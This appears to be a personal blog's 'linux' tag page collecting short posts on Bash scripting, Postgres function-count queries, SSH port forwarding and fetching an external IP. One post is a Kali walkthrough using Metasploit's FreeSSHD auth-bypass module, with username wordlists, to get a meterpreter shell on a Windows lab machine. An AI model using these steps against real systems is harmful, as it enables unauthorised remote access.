Top
JohnKlann / Posts tagged "linux"

Bash Execute Script At Specific Time Without Cron

#!/bin/bash

#Set Execution time to 3:15:01 PM
TimeToExecute="15:15:01"

while true; do
    #Convert Execution Time to Epoch
    GoalTime=$(date -d "$TimeToExecute" +"%s")
    #Get epoch of 12:00:00 AM
    BaseTime=$(date -d "00:00:00" +"%s")
    #Get the current epoch
    CurrentTime=$(date +"%s")
    #Get the epoch difference between the goal execution time and current time
    TimeDifference=$(date -d "0 $GoalTime seconds - $CurrentTime seconds" +"%s")
    #Get the difference between the "TimeDifference" and 12:00:00 AM 
    BaseDifference=$(( $BaseTime -$TimeDifference ))
    #If BaseDifference is equal to zero then execute script
    if [[ "$BaseDifference" -eq 0 ]]; then
            echo "Executing Script- date"
            /path/to/my/script.sh 
    fi
    sleep 1
done

 

jklann

List Files with their absolute path using Bash

function lsfp(){
local dirpath="$1"
local recurse="$2"

if [[ "$dirpath" == "" ]]; then
echo "no path provided!"
exit
else
local dirpath=$(echo "$dirpath" | sed 's:/$::g')
fi

local DirArr=($(ls -l "$dirpath" | grep -P "^d" | grep -oP "(?<= \d\d\:\d\d ).*"))
local FileArr=($(ls -l $dirpath | grep -oP "(?<= \d\d\:\d\d ).*$"))

for file in "${FileArr[@]}"; do
local fp="$dirpath/$file"
echo "$fp"
done

if [[ "$recurse" != "" ]]; then
for direc in "${DirArr[@]}"; do
lsfp "$dirpath/$direc" "$recurse"
done
fi
}
jklann

Basic Array Syntax, Iteration, Manipulation

So I recently took on a project where one of the requirements is that it has to be completed in Linux Bash and have as little outside dependencies as possible. So As Bash does not support multi-dimensional arrays, i’ll just cover array basics for now lol.

  1. Array Declaration:
    ARR=()
    
  2. Adding to Array
    1. values
      ARR+=('value')
      
    2. variables
      ARR+=("$VAR")
      
  3. Getting Array Length
    ARRLEN=${#ARR[@]}
    
  4. Iterating/Looping through Array (be mindful of your spacing)
    for (( i=0; i&lt;${ARRLEN}; i++ )); do
    	echo "${ARR[$i]}"
    done
    
  5. Putting it all together:
    #!/bin/bash
    
    ARR=()
    
    VAR="World"
    
    echo "adding value to array"
    
    ARR+=('hello')
    
    ARRLEN=${#ARR[@]}
    
    echo "Array length is now: $ARRLEN"
    
    echo "adding variable to array"
    
    ARR+=("$VAR")
    
    ARRLEN=${#ARR[@]}
    
    echo "Array length is now: $ARRLEN"
    
    echo "loop through array"
    
    for (( i=0; i&lt;${ARRLEN}; i++ )); do
            echo "Array Key/Index: $i holds Value: ${ARR[$i]}"
    done
    
  6. Returns:

linux_bash_basic_array_operations

jklann

Postgres How To Get List of Functions Like PGAdmin III

Recently I had the need to get a bunch of object stats and counts of two postgres databases to compare them. The goal was to confirm both via query results as well as visually via PGAdmin III, just in case I missed something in excel :P. Anyways I quickly realized that some of my object counts did not match the UI counts. After a little playing with the query I realized the UI splits the Functions into aggregates, functions, and trigger functions. However by default the UI hides the views for aggregates and trigger functions and you have to manually specify these to be shown in schema tree.

File -> Options
pg_admin_III_file_options

Browser -> Display -> Objects
pg_admin_III_file_options_browser_display_objects

So If you are wanting to get only user functions like the list that is in PGAdmin III under each schema in the function tree. You will want to remember to exclude aggregate functions and trigger functions.

This Query does just that. It gets the count of functions per schema just like displayed in the UI.

select ns.nspname, count(*)
from pg_proc pr
join pg_namespace ns on 
    pr.pronamespace = ns.oid
--Exlcude system schemas
where ns.nspname <> 'pg_catalog' 
    and ns.nspname <> 'information_schema' 
    --Exclude Trigger Functions
    and pr.oid not in 
        (select tgfoid from pg_trigger)
    --Exclude aggregate functions
    and pr.proisagg = 'f'
group by ns.nspname
order by ns.nspname;

This Query Gets a count of Aggregate functions per schema.

select ns.nspname, count(*)
from pg_proc pr
join pg_namespace ns on 
      pr.pronamespace = ns.oid
--Exlcude system schemas
where ns.nspname <> 'pg_catalog' 
    and ns.nspname <> 'information_schema' 
    --Exclude Trigger Functions
    and pr.oid not in 
         (select tgfoid from pg_trigger)
    --include aggregate functions
    and pr.proisagg = 't'
group by ns.nspname
order by ns.nspname

Lastly this Query Gets a count of Trigger functions per schema.

select ns.nspname, count(*)
from pg_proc pr
join pg_namespace ns on 
    pr.pronamespace = ns.oid
--Exlcude system schemas
where ns.nspname <> 'pg_catalog' 
    and ns.nspname <> 'information_schema' 
    --Include Trigger Functions
    and pr.oid in
         (select tgfoid from pg_trigger)
group by ns.nspname
order by ns.nspname

Now you have a set of Function count queries that will match the PGAdmin III UI.

jklann

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

jklann
port forward config router

How to: Setup Port Forwarding For SSH

Port forwarding will allow you to connect to your SSH server from anywhere, and it is really easy to do.

Requirements:

Administrator access to your router
Putty client

Step 1: Login to router

Login to your router via a web browser using its IP address (default is 192.168.1.1)

router browser login

Next you locate where you can setup port forwarding. In my case it is under  Applications & Gaming sub tab Single Port Forwarding.

Once located create a custom forward with the following settings:

Internal port: 22
IP address of your SSH server.

Save the settings.

port forward config router

Step 2: Get your external IP address

You can find your external IP address by visiting http://johnklann.com/getmyip.php

 *Note: Unless you have a static IP provisioned by your ISP, your external IP address will most likely change often. There are several services that allow you to track the change, and assign a domain name to it (Never had much luck with them). I went with a much more simple approach. View the article here.

Step 3: Creating your first external connection

From computer outside your LAN open your putty client.
Enter your external IP address into the Hosts field and click open.

putty setup ext ssh session
If you receive a popup box like the following select yes to continue:

rsa key working ssh
Enter your username and password:

ssh login
Then you will receive a shell on the SSH server:

secure shell on remote ssh server

Related Articles:

jklann

Python: How to get external IP address

Here is a short simple way to get the external ip address of a machine using python. This of course is useful if your machine is sitting behind a router or a sub network. So unfortunately there is no one liner in python to grab your external ip address which means a third party service must be used. However you can be your own “third party” service if you own a website. (If you don’t you can always use mine!)

Step 1:

Create a php file called getmyip.php you will want to include the following code:

<?php

$ipaddress = $_SERVER["REMOTE_ADDR"];

Echo "Your IP is $ipaddress!";

?>

Upload this to your website and mark the location.

Step 2:

Create a python file called my_external_ip.py you will want to include the following code:

import urllib

import re

def get_external_ip():
site = urllib.urlopen("http://yourwebsite.com/getmyip.php").read() #if you want to use my website the url is: http://johnklann.com/getmyip.php
ip=re.findall(r'[0-9]+(?:\.[0-9]+){3}', site)
address = ip[0]
print address
return address

get_external_ip()

Then just execute the python script.

You can find the source here

jklann